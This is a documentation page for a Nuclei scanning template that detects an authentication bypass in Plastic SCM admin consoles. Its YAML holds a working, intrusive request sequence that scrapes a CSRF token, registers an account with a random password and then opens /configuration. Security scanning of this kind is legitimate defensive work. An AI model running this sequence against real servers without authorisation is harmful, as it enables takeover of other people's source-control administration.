Plastic Admin Console - Authentication Bypass
ID: unauthorized-plastic-scm
Severity: critical
Author: DEENA
Tags: plastic,misconfig,intrusive
Description
Section titled “Description”A Plastic Admin console was discovered.
YAML Source
Section titled “YAML Source”id: unauthorized-plastic-scm
info: name: Plastic Admin Console - Authentication Bypass author: DEENA severity: critical description: A Plastic Admin console was discovered. reference: - https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468 classification: cvss-metrics: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-288 metadata: max-request: 3 tags: plastic,misconfig,intrusive
http: - raw: - | GET /account/register HTTP/1.1 {{Hostname}} - | POST /account/register HTTP/1.1 Host: {{Hostname}} Origin: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/account/register Connection: close
Password={{randstr}}&ConfirmPassword={{randstr}}&RememberMe=true&__RequestVerificationToken={{csrf}}&RememberMe=false - | GET /configuration HTTP/1.1 {{Hostname}}
extractors: - type: regex part: body internal: true group: 1 name: csrf regex: - 'RequestVerificationToken" type="hidden" value="([A-Za-z0-9_-]+)" \/>'
matchers-condition: and matchers: - type: word words: - "<title>Network - Plastic SCM</title>" part: body
- type: status status: - 200# digest: 4b0a00483046022100b70425e278bfa8cc33a807ed909678d0763e011ee3160e248189da65f3da911f022100c4de3f2debe2a163fcb28f097dc391b51f1d9969a04d23a468a1961c5df9e547:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/misconfiguration/unauthorized-plastic-scm.yaml"